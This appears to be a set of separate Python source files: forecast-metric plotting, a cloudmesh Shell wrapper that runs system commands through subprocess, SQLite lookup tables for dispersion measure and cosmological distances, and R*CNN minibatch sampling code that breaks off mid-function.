ax = axes[ax_idx]
for bar_idx, forecast_entry in enumerate(forecast_index_entries):
forecast_id = forecast_entry["forecast_id"]
row = metrics_df.query(
f"forecast_id=='{forecast_id}' and metric_name=='{metric_name}'")
assert len(row) == 1, (
"Duplicate entries found in metrics dataframe. "
f"Found {len(row)} entries for {forecast_id} and {metric_name}")
row = row.iloc[0]
metric_value = row.metric_value
ax.bar(
x_values[bar_idx],
metric_value,
width=column_width,
zorder=2,
color=colour_map[bar_idx],
label=_get_model_label(forecast_entry))
ax.set_xticklabels([])
ax.set_xticks([])
ax.set_ylabel(metric_name)
axes[0].legend(
ncol=len(forecast_index_entries),
loc="center left",
bbox_to_anchor=[0., 1.07],
frameon=False)
fig.text(0, 0, _get_plot_footnote(num_sites, num_dates, dropped_sites,
cadence))
fig.suptitle(
_get_plot_title(target_name, last_observation_date,
eval_dataset_creation_date, forecast_horizon),
y=1.35,
x=1)
return fig
def _get_model_label(forecast_entry: base_indexing.IndexEntryType) -> str:
"""Gets a description of a model from its entry in the forecast index."""
description = str(forecast_entry["forecast_id"])
if "model_description" in forecast_entry["extra_info"]:
description += f": {forecast_entry['extra_info']['model_description']}"
return description
def _get_plot_title(target_name: str, last_observation_date: str,
eval_dataset_creation_date: str,
forecast_horizon: int) -> str:
"""Gets the title of the plot."""
return (
f"Comparison of metrics for predicting {target_name}. Forecast date: "
f"{last_observation_date}, forecast horizon: {forecast_horizon} days, "
f"evaluation reporting date: {eval_dataset_creation_date}.")
def _get_plot_footnote(num_sites: int, num_dates: int,
dropped_sites: np.ndarray, cadence: int):
"""Gets the footnote to be added to the plot."""
footnote = (
f"Forecasts evaluated in this plot have a cadence of {cadence} days. "
f"{num_dates} dates and {num_sites} sites were included in the "
"evaluation that produced this plot.")
if dropped_sites.size:
footnote += (
"Note that the following sites were dropped from some forecasts during "
f"evaluation to achieve an overlapping set of sites: {dropped_sites}")
return footnote
def _plot_trajectories(
all_forecast_entries: List[Any],
all_forecast_arrays: List[Any],
target_name: constants.Targets,
num_sites: int,
eval_dataset: Any = None
) -> plt.Figure:
"""Plots trajectories.
Args:
all_forecast_entries: TODO
all_forecast_arrays: TODO
target_name: the target being predicted.
num_sites: number of sites to plot
eval_dataset: evaluation dataset
Returns:
Figure.
"""
fig = plt.figure(figsize=(16, 16))
dates = all_forecast_arrays[0].dates_array
num_dates = len(dates)
forecast_x = np.arange(num_dates)
x = forecast_x.copy()
x_stride = 14 # Weekly x tick strides.
previous_x = None
avg_values = []
for fa in all_forecast_arrays:
avg_values.append(np.squeeze(fa.data_array, axis=2).mean(axis=0))
site_indices = np.argsort(np.max(avg_values, axis=0))[::-1][:num_sites]
site_names = all_forecast_arrays[0].sites_array[site_indices]
n = len(site_names)
nrows = int(np.ceil(np.sqrt(n)))
ncols = int(np.ceil(n / nrows))
axes = fig.subplots(nrows, ncols)
fig.subplots_adjust(hspace=0.35)
flat_axes = sum(map(list, axes), [])
for _ in range(nrows * ncols - n):
ax = flat_axes.pop()
fig.delaxes(ax)
num_colors = len(all_forecast_entries) + 1
colormap = plt.get_cmap("tab20")
colors = [colormap(i / num_colors) for i in range(num_colors)]
if eval_dataset is not None:
num_previous_dates = num_dates
previous_dates = eval_dataset.training_dates[-num_previous_dates:]
previous_x = np.arange(num_previous_dates)
previous_true_ys = eval_dataset.training_targets[-num_previous_dates:, :, 0]
forecast_true_ys = eval_dataset.evaluation_targets[-num_previous_dates:, :,
0]
forecast_x += num_previous_dates
dates = np.concatenate([previous_dates, dates])
x = np.concatenate([previous_x, forecast_x])
num_dates = len(dates)
x_idx = np.arange(num_dates)[::-1][::x_stride][::-1]
# Center the x axis date ticks around the forecast date.
diffs = x_idx - forecast_x[0]
smallest_diff = np.argmin(np.abs(diffs))
x_idx -= diffs[smallest_diff]
x_idx = np.clip(x_idx, 0, len(x) - 1)
for ax, site_name in zip(flat_axes, site_names):
title = f'site_name="{site_name}"'
ax.set_title(title)
site_idx = all_forecast_arrays[0].sites_array.tolist().index(site_name)
if previous_x is not None:
previous_true_y = previous_true_ys[:, site_idx]
forecast_true_y = forecast_true_ys[:, site_idx]
# Plot vertical forecast date line.
combined_y = np.concatenate([previous_true_y, forecast_true_y])
mn = np.min(combined_y)
mx = np.max(combined_y)
ax.plot(
[forecast_x[0] - 0.5] * 2, [mn, mx],
color=(0.5, 0.5, 0.5),
linestyle="--",
label=f"(forecast date={dates[forecast_x[0]]})")
# Plot past and future true data.
ax.plot(previous_x, previous_true_y, color="k")
ax.plot(forecast_x, forecast_true_y, color="k", label="true_data")
# Plot the forecast trajectories.
ax.axes.set_prop_cycle(color=colors) # Color forecast curves differently.
for forecast_entry, forecast_array in zip(all_forecast_entries,
all_forecast_arrays):
y = forecast_array.data_array[:, site_idx, 0]
ax.plot(
forecast_x, y, label=f"forecast_id={forecast_entry['forecast_id']}")
ax.set_xticks(x[x_idx])
ax.set_xticklabels(dates[x_idx], rotation=30)
if ax.is_last_row():
ax.set_xlabel("Date")
if ax.is_first_col():
ax.set_ylabel(target_name.value)
if ax.is_first_col() and ax.is_first_row():
ax.legend(loc="upper left")
return fig
def plot_trajectories_and_save(directory: str, forecast_ids: Sequence[str],
eval_dataset_creation_date: str,
forecast_horizon: int, save: bool,
target_name: constants.Targets,
all_forecast_entries: List[Any],
all_forecast_arrays: List[Any],
num_sites: int = 16,
eval_dataset: Any = None,
overwrite: bool = False) -> None:
"""Plots trajectories and saves them to file."""
fig = _plot_trajectories(all_forecast_entries, all_forecast_arrays,
target_name, num_sites, eval_dataset=eval_dataset)
if save:
trajectories_dir = pathlib.Path(directory) / "trajectories"
filename_base = (
f"trajectories_{'_'.join(forecast_ids)}_{eval_dataset_creation_date}_"
f"{forecast_horizon}d")
plot_filepath = trajectories_dir / f"{filename_base}.png"
if not trajectories_dir.exists():
trajectories_dir.mkdir(parents=True)
if not overwrite and plot_filepath.exists():
raise IOError(f"Trajectories already exist at {plot_filepath}")
logging.info("Saving trajectory plots to %s", plot_filepath)
fig.savefig(plot_filepath, format="png", bbox_inches="tight")
|
|
#
# demo to start os command
#
# from subprocess import check_output
# cmd = r'C:\cygwin64\bin\ps.exe'
# output = check_output(cmd)
# print (output)
import subprocess
import glob
import json
import platform
import os
from cloudmesh_base.util import path_expand
class Shell(object):
cygwin_path = 'bin' #i copied fom C:\cygwin\bin
command = {
'windows': {},
'linux':{},
'darwin': {}
}
'''
big question for badi and others
how do we now define dynamically functions based on a list that we want to support
what we want is where args are multiple unlimited parameters to the function
def f(args...):
name = get the name from f
a = list of args...
cls.execute(cmd, arguments=a, capture=True, verbose=False)
commands = ['ps', 'ls', ..... ]
for c in commands:
generate this command and add to this class dynamically
or do something more simple
ls = cls.execute('cmd', args...) # i think that is what badi does
'''
@classmethod
def ls(cls, *args): return cls.execute('ls', args)
@classmethod
def ps(cls, *args): return cls.execute('ps',args)
@classmethod
def bash(cls, *args): return cls.execute('bash',args)
@classmethod
def cat(cls, *args): return cls.execute('cat',args)
@classmethod
def git(cls, *args): return cls.execute('git',args)
@classmethod
def VBoxManage(cls, *args): return cls.execute('VBoxManage',args)
@classmethod
def blockdiag(cls, *args): return cls.execute('blockdiag',args)
@classmethod
def cm(cls, *args): return cls.execute('cm',args)
@classmethod
def fgmetric(cls, *args): return cls.execute('fgmetric',args)
@classmethod
def fgrep(cls, *args): return cls.execute('fgrep',args)
@classmethod
def gchproject(cls, *args): return cls.execute('gchproject',args)
@classmethod
def gchuser(cls, *args): return cls.execute('gchuser',args)
@classmethod
def glusers(cls, *args): return cls.execute('glusers',args)
@classmethod
def gmkproject(cls, *args): return cls.execute('gmkproject',args)
@classmethod
def grep(cls, *args): return cls.execute('grep',args)
@classmethod
def gstatement(cls, *args): return cls.execute('gstatement',args)
@classmethod
def head(cls, *args): return cls.execute('head',args)
@classmethod
def keystone(cls, *args): return cls.execute('keystone',args)
@classmethod
def kill(cls, *args): return cls.execute('kill',args)
@classmethod
def ls(cls, *args): return cls.execute('ls',args)
@classmethod
def mongoimport(cls, *args): return cls.execute('mongoimport',args)
@classmethod
def mysql(cls, *args): return cls.execute('mysql',args)
@classmethod
def nosetests(cls, *args): return cls.execute('nosetests',args)
@classmethod
def nova(cls, *args): return cls.execute('nova',args)
@classmethod
def ping(cls, *args): return cls.execute('ping',args)
@classmethod
def pwd(cls, *args): return cls.execute('pwd',args)
@classmethod
def rackdiag(cls, *args): return cls.execute('rackdiag',args)
@classmethod
def rm(cls, *args): return cls.execute('rm',args)
@classmethod
def rsync(cls, *args): return cls.execute('rsync',args)
@classmethod
def scp(cls, *args): return cls.execute('scp',args)
@classmethod
def sort(cls, *args): return cls.execute('sort',args)
@classmethod
def sh(cls, *args): return cls.execute('ssh',args)
@classmethod
def ssh(cls, *args): return cls.execute('ssh',args)
@classmethod
def sudo(cls, *args): return cls.execute('sudo',args)
@classmethod
def tail(cls, *args): return cls.execute('tail',args)
@classmethod
def vagrant(cls, *args): return cls.execute('vagrant',args)
@classmethod
def mongod(cls, *args): return cls.execute('mongod',args)
@classmethod
def grep(cls, *args): return cls.execute('grep',args)
@classmethod
def dialog(cls, *args): return cls.execute('dialog',args)
@classmethod
def pip(cls, *args): return cls.execute('pip',args)
@classmethod
def remove_line_with(cls, lines, what):
result = []
for line in lines:
if what not in line:
result = result + [line]
return result
@classmethod
def find_lines_with(cls, lines, what):
result = []
for line in lines:
if what in line:
result = result + [line]
return result
def __init__(cls):
if cls.operating_system() == "windows":
cls.find_cygwin_executables()
else:
pass
# implement for cmd, for linux we can just pass as it includes everything
@classmethod
def find_cygwin_executables(cls):
"""
find the executables
"""
exe_paths = glob.glob(cls.cygwin_path + r'\*.exe')
# print cls.cygwin_path
# list all *.exe in cygwin path, use glob
for c in exe_paths:
exe = c.split('\\')
name = exe[1].split('.')[0]
#command['windows'][name] = "{:}\{:}.exe".format(cygwin_path, c)
cls.command['windows'][name] = c
@classmethod
def terminal_type(cls):
"""
returns darwin, cygwin, cmd, or linux
"""
what = platform.system().lower()
kind = None
if 'linux' in what:
kind = 'linux'
elif 'darwin' in what:
kind = 'darwin'
elif 'cygwin' in what:
kind = 'cygwin'
else:
kind = 'cmd'
return kind
@classmethod
def ttype(cls):
t = cls.terminal_type()
if 'linux' in t or 'darwin' in t or 'cygwin' in t:
return 'linux'
elif 'cmd' in t:
return 'windows'
@classmethod
def which(cls, command):
t = cls.ttype()
if 'windows' in t and cls.command_exists(name):
return cls.command['windows'][name]
elif 'linux' in t:
cmd = ["which",command]
result = subprocess.check_output(cmd).rstrip()
if len(result) == 0:
return None
else:
return result
@classmethod
def command_exists(cls, name):
t = cls.ttype()
if 'windows' in t:
#only for windows
cls.find_cygwin_executables()
return name in cls.command['windows']
elif 'linux' in t:
r = which(name)
return r
@classmethod
def list_commands(cls):
t = cls.ttype()
if 'windows' in t:
#only for windows
cls.find_cygwin_executables()
print '\n'.join(cls.command['windows'])
else:
print ("ERROR: this command is not supported for this OS")
@classmethod
def operating_system(cls):
return platform.system().lower()
@classmethod
def execute(cls, cmd, arguments=""):
"""Run Shell command
:param cmd: command to run
:param arguments: we dont know yet
:param capture: if true returns the output
:return:
"""
# print "--------------"
terminal_type = cls.ttype()
# print cls.command
if ('linux' in terminal_type):
os_command = [cmd]
elif 'cmd' in terminal_type: # for cmd
if not cls.command_exists(cmd):
print "ERROR: the command could not be found", cmd
return
else:
os_command = [cls.command[cls.operating_system()][cmd]]
if isinstance(arguments, list):
os_command = os_command + arguments
elif isinstance(arguments, tuple):
os_command = os_command + list(arguments)
elif isinstance(arguments, str):
os_command = os_command + arguments.split()
else:
print "ERROR: Wrong parameter type", type(arguments)
result = subprocess.check_output(os_command, stderr=subprocess.STDOUT).rstrip()
return result
@classmethod
def mkdir(cls, newdir):
"""works the way a good mkdir should :)
- already exists, silently complete
- regular file in the way, raise an exception
- parent directory(ies) does not exist, make them as well
"""
"""http://code.activestate.com/recipes/82465-a-friendly-mkdir/"""
_newdir = path_expand(newdir)
if os.path.isdir(_newdir):
pass
elif os.path.isfile(_newdir):
raise OSError("a file with the same name as the desired "
"dir, '%s', already exists." % _newdir)
else:
head, tail = os.path.split(_newdir)
if head and not os.path.isdir(head):
os.mkdir(head)
if tail:
os.mkdir(_newdir)
def main():
shell = Shell()
print shell.terminal_type()
r = shell.execute('pwd') # copy line replace
print r
#shell.list()
#print json.dumps(shell.command, indent=4)
# test some commands without args
"""
for cmd in ['whoami', 'pwd']:
r = shell._execute(cmd)
print "---------------------"
print "Command: {:}".format(cmd)
print "{:}".format(r)
print "---------------------"
"""
r = shell.execute('ls', ["-l", "-a"])
print r
r = shell.execute('ls', "-l -a")
print r
r = shell.ls("-aux")
print r
r = shell.ls("-a", "-u", "-x")
print r
r = shell.pwd()
print r
if __name__ == "__main__":
main()
|
|
"""Create a lookup tables for redshift and the NE2001 dispersion measure."""
import os
import numpy as np
import sqlite3
import sys
from scipy.integrate import quad
from tqdm import tqdm
from joblib import Parallel, delayed
import frbpoppy.galacticops as go
from frbpoppy.misc import pprint
from frbpoppy.paths import paths
class NE2001Table:
"""Create/use a NE2001 lookup table for dispersion measure."""
def __init__(self, test=False):
"""Initializing."""
self.test = test
self.set_file_name()
# Setup database
self.db = False
self.step = 0.1
self.rounding = 2
# For parallel processes
self.temp_path = None
if self.test:
self.step = 0.1
if os.path.exists(self.file_name):
os.remove(self.file_name)
if os.path.exists(self.file_name) and self.test is False:
self.db = True
else:
# Calculations take quite some time
# Provide a way for people to quit
try:
self.create_table()
except KeyboardInterrupt:
pprint('Losing all progress in calculations')
os.remove(self.file_name)
if self.temp:
os.remove(self.temp_path)
sys.exit()
def set_file_name(self):
"""Determine filename."""
uni_mods = os.path.join(paths.models(), 'universe/')
self.file_name = uni_mods + 'dm_mw.db'
if self.test:
uni_mods = os.path.join(paths.models(), 'universe/')
self.file_name = uni_mods + 'test_dm_mw.db'
def create_table(self, parallel=True):
"""Create a lookup table for dispersion measure."""
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
# Set array of coordinates
gls = np.arange(-180., 180. + self.step, self.step).round(1)
gbs = np.arange(-90., 90. + self.step, self.step).round(1)
dist = 0.1 # [Gpc]
gls = gls.astype(np.float32)
gbs = gbs.astype(np.float32)
# Create database
c.execute('create table dm ' +
'(gl real, gb real, dm_mw real)')
# Give an update on the progress
m = ['Creating a DM lookup table',
' - Only needs to happen once',
' - Unfortunately pretty slow',
' - Prepare to wait for ~1.5h (4 cores)',
' - Time given as [time_spent<time_left] in (hh:)mm:ss',
'Starting to calculate DM values']
for n in m:
pprint(n)
n_opt = len(gls)*len(gbs)
options = np.array(np.meshgrid(gls, gbs)).T.reshape(-1, 2)
dm_mw = np.zeros(len(options)).astype(np.float32)
def dm_tot(i, dm_mw):
gl, gb = options[i]
dm_mw[i] = go.ne2001_dist_to_dm(dist, gl, gb)
if parallel:
temp_path = os.path.join(paths.models(), 'universe/') + 'temp.mmap'
self.temp_path = temp_path
# Make a temp memmap to have a sharedable memory object
temp = np.memmap(temp_path, dtype=dm_mw.dtype,
shape=len(dm_mw),
mode='w+')
# Parallel process in order to populate array
r = range(n_opt)
j = min([4, os.cpu_count() - 1])
print(os.cpu_count())
Parallel(n_jobs=j)(delayed(dm_tot)(i, temp) for i in tqdm(r))
# Map results
r = np.concatenate((options, temp[:, np.newaxis]), axis=1)
results = map(tuple, r.tolist())
# Delete the temporary directory and contents
try:
os.remove(temp_path)
except FileNotFoundError:
print(f'Unable to remove {temp_path}')
else:
for i in tqdm(range(n_opt)):
dm_tot(i, dm_mw)
# Save results to database
dm_mw = dm_mw.astype(np.float32)
r = np.concatenate((options, dm_mw[:, np.newaxis]), axis=1)
results = map(tuple, r.tolist())
pprint(' - Saving results')
c.executemany('insert into dm values (?,?,?)', results)
# Make for easier searching
c.execute('create index ix on dm (gl, gb)')
# Save
conn.commit()
pprint('Finished DM table')
def lookup(self, gal, gab):
"""Look up associated milky way dispersion measure with gal coords.
Args:
gl (array): Galactic longitude [fractional degrees]
gb (array): Galactic latitude [fractional degrees]
Returns:
dm_mw (float): Galactic dispersion measure [pc*cm^-3]
"""
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
dm_mw = np.ones_like(gal)
# Round values
def frac_round(x, prec=self.rounding, base=1):
return np.round(base * np.round(x/base), prec)
# Round values
gal = frac_round(gal, self.rounding)
gab = frac_round(gab, self.rounding)
# Search database
query = 'select dm_mw from dm where gl=? and gb=? limit 1'
for i, gl in enumerate(gal):
dm_mw[i] = c.execute(query, [str(gl), str(gab[i])]).fetchone()[0]
# Close database
conn.close()
return dm_mw
class DistanceTable:
"""
Create/use a lookup table for comoving distance, volume, redshift etc.
Create a list of tuples to lookup the corresponding redshift for a comoving
distance [Gpc] (or the other way around). Uses formulas from
Hoggs et al. (1999) for the cosmological calculations. To avoid long
calculation times, it will check if a previous run with the same parameters
has been done, which it will then load it. If not, it will calculate a new
table, and save the table for later runs. Covers z, dist, vol, dvol,
cdf_sfr and cdf_smd.
Args:
H_0 (float, optional): Hubble parameter. Defaults to 67.74 km/s/Mpc
W_m (float, optional): Omega matter. Defaults to 0.3089
W_k (float, optional): Omega vacuum. Defaults to 0.6911
"""
def __init__(self, H_0=67.74, W_m=0.3089, W_v=0.6911, test=False):
"""Initializing."""
self.H_0 = H_0
self.W_m = W_m
self.W_v = W_v
self.test = test
self.set_file_name()
# Setup database
self.db = False
self.step = 0.00001
self.z_max = 6.5
if self.test:
self.step = 0.001
self.z_max = 6.5
if os.path.exists(self.file_name):
os.remove(self.file_name)
if os.path.exists(self.file_name) and self.test is False:
self.db = True
else:
# Calculations take quite some time
# Provide a way for people to quit
try:
self.create_table()
except KeyboardInterrupt:
pprint('Losing all progress in calculations')
os.remove(self.file_name)
sys.exit()
def set_file_name(self):
"""Determine filename."""
uni_mods = os.path.join(paths.models(), 'universe/')
def cvt(value):
"""Convert a float to a string without a period."""
return str(value).replace('.', 'd')
# Convert
paras = ['h0', cvt(self.H_0),
'wm', cvt(self.W_m),
'wv', cvt(self.W_v)]
f = '-'.join(paras)
self.file_name = uni_mods + f'{f}.db'
if self.test:
self.file_name = uni_mods + 'cosmo_test.db'
def create_table(self):
"""Create a lookup table for distances."""
m = ['Creating a distance table',
' - Only needs to happen once',
' - May take up to 2m on a single core']
for n in m:
pprint(n)
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
H_0 = self.H_0
W_m = self.W_m
W_v = self.W_v
W_k = 1.0 - W_m - W_v # Omega curvature
if W_k != 0.0:
pprint('Careful - Your cosmological parameters do not sum to 1.0')
zs = np.arange(0, self.z_max+self.step, self.step)
# Create database
t = 'real'
par = f'(z {t}, dist {t}, vol {t}, dvol {t}, cdf_sfr {t}, cdf_smd {t})'
s = f'create table distances {par}'
c.execute(s)
results = []
pprint(' - Calculating parameters at various redshifts')
conv = go.Redshift(zs, H_0=H_0, W_m=W_m, W_v=W_v)
dists = conv.dist_co()
vols = conv.vol_co()
# Get dV
dvols = np.zeros_like(vols)
dvols[1:] = np.diff(vols)
pprint(' - Calculating Star Formation Rate')
# Get pdf sfr
pdf_sfr = sfr(zs)*dvols
cdf_sfr = np.cumsum(pdf_sfr) # Unnormalized
cdf_sfr /= cdf_sfr[-1]
pprint(' - Calculating Stellar Mass Density')
# Get pdf csmd
pdf_smd = smd(zs, H_0=H_0, W_m=W_m, W_v=W_v)*dvols
cdf_smd = np.cumsum(pdf_smd) # Unnormalized
cdf_smd /= cdf_smd[-1]
results = np.stack((zs, dists, vols, dvols, cdf_sfr, cdf_smd)).T
pprint(' - Saving values to database')
# Save results to database
data = map(tuple, results.tolist())
c.executemany('insert into distances values (?,?,?,?,?,?)', data)
# Make for easier searching
# I don't really understand SQL index names...
c.execute('create index ix on distances (z)')
c.execute('create index ixx on distances (dist)')
c.execute('create index ixxx on distances (vol)')
c.execute('create index ixxxx on distances (dvol)')
c.execute('create index ixxxxx on distances (cdf_sfr)')
c.execute('create index ixxxxxx on distances (cdf_smd)')
# Save
conn.commit()
pprint('Finished distance table')
def lookup(self, z=None, dist_co=None, vol_co=None, dvol_co=None,
cdf_sfr=None, cdf_smd=None):
"""Look up associated values with input values."""
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
# Check what's being looked up, set all other keywords to same length
kw = {'z': z,
'dist': dist_co,
'vol': vol_co,
'dvol': dvol_co,
'cdf_sfr': cdf_sfr,
'cdf_smd': cdf_smd}
for key, value in kw.items():
if value is not None:
in_par = key
break
for key, value in kw.items():
if key != in_par:
kw[key] = np.ones_like(kw[in_par])
keys = list(kw.keys())
# Search database
query = f'select * from distances where {in_par} > ? limit 1'
for i, r in enumerate(kw[in_par]):
d = c.execute(query, [str(r)]).fetchone()
for ii, key in enumerate(keys):
if key == in_par:
continue
kw[key][i] = d[ii]
# Close database
conn.close()
return list(kw.values())
def sfr(z):
"""Return the number density of star forming rate at redshift z.
Follows Madau & Dickinson (2014), eq. 15. For more info see
https://arxiv.org/pdf/1403.0007.pdf
"""
return (1+z)**2.7/(1+((1+z)/2.9)**5.6)
def smd(z, H_0=67.74, W_m=0.3089, W_v=0.6911):
"""Return the number density of Stellar Mass Density at redshift z.
Follows Madau & Dickinson (2014), eq. 2 & 15. For more info see
https://arxiv.org/pdf/1403.0007.pdf
"""
def integral(z):
z1 = z + 1
return z1**1.7/(1+(z1/2.9)**5.6)*(1/(H_0*(W_m*z1**3+W_v)**0.5))
def csmd(z):
return 0.01095*quad(integral, z, np.inf)[0]
vec_csmd = np.vectorize(csmd)
return vec_csmd(z)
|
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# R*CNN
# Written by Georgia Gkioxari, 2015.
# See LICENSE in the project root for license information.
# --------------------------------------------------------
"""Compute minibatch blobs for training a Fast R*CNN network."""
import numpy as np
import numpy.random as npr
import cv2
from fast_rcnn.config import cfg
from utils.blob import prep_im_for_blob, im_list_to_blob
import utils.cython_bbox
def get_minibatch(roidb, num_classes):
"""Given a roidb, construct a minibatch sampled from it."""
num_images = len(roidb)
# Sample random scales to use for each image in this batch
random_scale_inds = npr.randint(0, high=len(cfg.TRAIN.SCALES),
size=num_images)
assert(cfg.TRAIN.BATCH_SIZE % num_images == 0), \
'num_images ({}) must divide BATCH_SIZE ({})'. \
format(num_images, cfg.TRAIN.BATCH_SIZE)
rois_per_image = cfg.TRAIN.BATCH_SIZE / num_images
fg_rois_per_image = np.round(cfg.TRAIN.FG_FRACTION * rois_per_image)
# Get the input image blob, formatted for caffe
im_blob, im_scales = _get_image_blob(roidb, random_scale_inds)
# Now, build the region of interest and label blobs
rois_blob = np.zeros((0, 5), dtype=np.float32)
secondary_rois_blob = np.zeros((0, 5), dtype = np.float32)
labels_blob = np.zeros((0), dtype=np.float32)
bbox_targets_blob = np.zeros((0, 4 * num_classes), dtype=np.float32)
bbox_loss_blob = np.zeros(bbox_targets_blob.shape, dtype=np.float32)
# all_overlaps = []
for im_i in xrange(num_images):
labels, overlaps, im_rois, sec_rois, bbox_targets, bbox_loss \
= _sample_rois(roidb[im_i], fg_rois_per_image, rois_per_image,
num_classes)
# Add to RoIs blob
rois = _project_im_rois(im_rois, im_scales[im_i])
batch_ind = im_i * np.ones((rois.shape[0], 1))
rois_blob_this_image = np.hstack((batch_ind, rois))
rois_blob = np.vstack((rois_blob, rois_blob_this_image))
# Add to Secondary RoIs blob
secondary_rois = _project_im_rois(sec_rois, im_scales[im_i])
secondary_batch_ind = im_i * np.ones((secondary_rois.shape[0], 1))
secondary_blob_this_image = np.hstack((secondary_batch_ind, secondary_rois))
secondary_rois_blob = np.vstack((secondary_rois_blob, secondary_blob_this_image))
# Add to labels, bbox targets, and bbox loss blobs
labels_blob = np.hstack((labels_blob, labels))
bbox_targets_blob = np.vstack((bbox_targets_blob, bbox_targets))
bbox_loss_blob = np.vstack((bbox_loss_blob, bbox_loss))
# all_overlaps = np.hstack((all_overlaps, overlaps))
# Size checks
assert(secondary_rois_blob.shape[0]==cfg.TRAIN.CONTEXT_NUM_ROIS*rois_blob.shape[0]),"Context and ROIs don't match"
assert(labels_blob.shape[0]==rois_blob.shape[0]),"Labels and ROIs don't match"
assert(bbox_targets_blob.shape[0]==rois_blob.shape[0])
assert(bbox_loss_blob.shape[0]==rois_blob.shape[0])
# For debug visualizations
# _vis_minibatch(im_blob, rois_blob, secondary_rois_blob, labels_blob)
blobs = {'data': im_blob,
'rois': rois_blob,
'secondary_rois': secondary_rois_blob,
'labels': labels_blob}
if cfg.TRAIN.BBOX_REG:
blobs['bbox_targets'] = bbox_targets_blob
blobs['bbox_loss_weights'] = bbox_loss_blob
return blobs
def _sample_rois(roidb, fg_rois_per_image, rois_per_image, num_classes):
"""Generate a random sample of RoIs comprising foreground and background
examples.
"""
# label = class RoI has max overlap with
labels = roidb['max_classes']
overlaps = roidb['max_overlaps']
rois = roidb['boxes']
secondary_rois = roidb['boxes']
# overlaps of boxes
boxes_overlaps = \
utils.cython_bbox.bbox_overlaps(rois.astype(np.float), rois.astype(np.float))
# Select foreground ROIs as those with >= FG_THRESH overlap
fg_inds = np.where(overlaps >= cfg.TRAIN.FG_THRESH)[0]
# Guard against the case when an image has fewer than fg_rois_per_image
# foreground ROIs
fg_rois_per_this_image = np.minimum(fg_rois_per_image, fg_inds.size)
# Sample foreground regions without replacement
if fg_inds.size > 0:
fg_inds = npr.choice(fg_inds, size=fg_rois_per_this_image,
replace=False)
# Select secondary ROIs for fg regions
valid_fg = np.zeros(fg_inds.shape[0], dtype=bool)
secondary_fg = np.zeros((0), dtype=np.int64)
for i,fg_i in enumerate(fg_inds):
cinds = np.where((boxes_overlaps[:,fg_i] >= cfg.TRAIN.IOU_LB) &
(boxes_overlaps[:,fg_i] <= cfg.TRAIN.IOU_UB))[0]
if cinds.size > cfg.TRAIN.CONTEXT_NUM_ROIS:
cinds = npr.choice(cinds, size = cfg.TRAIN.CONTEXT_NUM_ROIS,
replace=False)
elif cinds.size > 0:
cinds = npr.choice(cinds, size = cfg.TRAIN.CONTEXT_NUM_ROIS,
replace=True)
if cinds.size > 0:
assert(cinds.size == cfg.TRAIN.CONTEXT_NUM_ROIS),"Secondary RoIs are not of correct size"
valid_fg[i] = 1
secondary_fg = np.concatenate((secondary_fg, cinds),axis=0)
# # DEBUGGING
# print "Image " + format(roidb['image'])
# print "Box index {:d} - Label {:d}".format(fg_i, labels[fg_i])
# print "Coords: {:d} {:d} {:d} {:d}".format(rois[fg_i,0],rois[fg_i,1],rois[fg_i,2],rois[fg_i,3])
# for j in xrange(cinds.size):
# print "Context Coords: {:d} {:d} {:d} {:d}" \
# .format(rois[cinds[j],0],rois[cinds[j],1],
# rois[cinds[j],2],rois[cinds[j],3])
fg_inds = fg_inds[valid_fg]
fg_rois_per_this_image = fg_inds.size
assert(fg_inds.size*cfg.TRAIN.CONTEXT_NUM_ROIS == secondary_fg.size),"[FG all] Does not match"
# The indices that we're selecting (both fg and bg)
keep_inds = fg_inds
keep_secondary_inds = secondary_fg
# Select sampled values from various arrays:
labels = labels[keep_inds]
overlaps = overlaps[keep_inds]
rois = rois[keep_inds]
secondary_rois = secondary_rois[keep_secondary_inds]
bbox_targets, bbox_loss_weights = \
_get_bbox_regression_labels(roidb['bbox_targets'][keep_inds, :],
num_classes)
return labels, overlaps, rois, secondary_rois, bbox_targets, bbox_loss_weights
def _get_image_blob(roidb, scale_inds):
"""Builds an input blob from the images in the roidb at the specified
scales.
"""
num_images = len(roidb)
processed_ims = []
im_scales = []
for i in xrange(num_images):
im = cv2.imread(roidb[i]['image'])
if roidb[i]['flipped']:
im = im[:, ::-1, :]
target_size = cfg.TRAIN.SCALES[scale_inds[i]]
im, im_scale = prep_im_for_blob(im, cfg.PIXEL_MEANS, target_size,
cfg.TRAIN.MAX_SIZE)
im_scales.append(im_scale)
processed_ims.append(im)
# Create a blob to hold the input images
blob = im_list_to_blob(processed_ims)
return blob, im_scales
def _project_im_rois(im_rois, im_scale_factor):
"""Project image RoIs into the rescaled training image."""
rois = im_rois * im_scale_factor
return rois
def _get_bbox_regression_labels(bbox_target_data, num_classes):
"""Bounding-box regression targets are stored in a compact form in the
roidb.
This function expands those targets into the 4-of-4*K representation used
by the network (i.e. only one class has non-zero targets). The loss weights
are similarly expanded.
Returns:
bbox_target_data (ndarray): N x 4K blob of regression targets
bbox_loss_weights (ndarray): N x 4K blob of loss weights
"""
clss = bbox_target_data[:, 0]
bbox_targets = np.zeros((clss.size, 4 * num_classes), dtype=np.float32)
bbox_loss_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
inds = np.where(clss >= 0)[0]
for ind in inds:
cls = clss[ind]
start = 4 * cls
end = start + 4
bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]
bbox_loss_weights[ind, start:end] = [1., 1., 1., 1.]
return bbox_targets, bbox_loss_weights
def _vis_minibatch(im_blob, rois_blob, secondary_rois_blob, labels_blob):
"""Visualize a mini-batch for debugging."""
import matplotlib.pyplot as plt
for i in xrange(rois_blob.shape[0]):
rois = rois_blob[i, :]
sec_rois = secondary_rois_blob[i*cfg.TRAIN.CONTEXT_NUM_ROIS:(i+1)*cfg.TRAIN.CONTEXT_NUM_ROIS,:]
im_ind = rois[0]
assert all(sec_rois[:,0]==im_ind)
roi = rois[1:]
im = im_blob[im_ind, :, :, :].transpose((1, 2, 0)).copy()
im += cfg.PIXEL_MEANS
im = im[:, :, (2, 1, 0)]
im = im.astype(np.uint8)
cls = labels_blob[i]
plt.imshow(im)
print 'class: ', cls
plt.gca().add_patch(
plt.Rectangle((roi[0], roi[1]), roi[2] - roi[0],
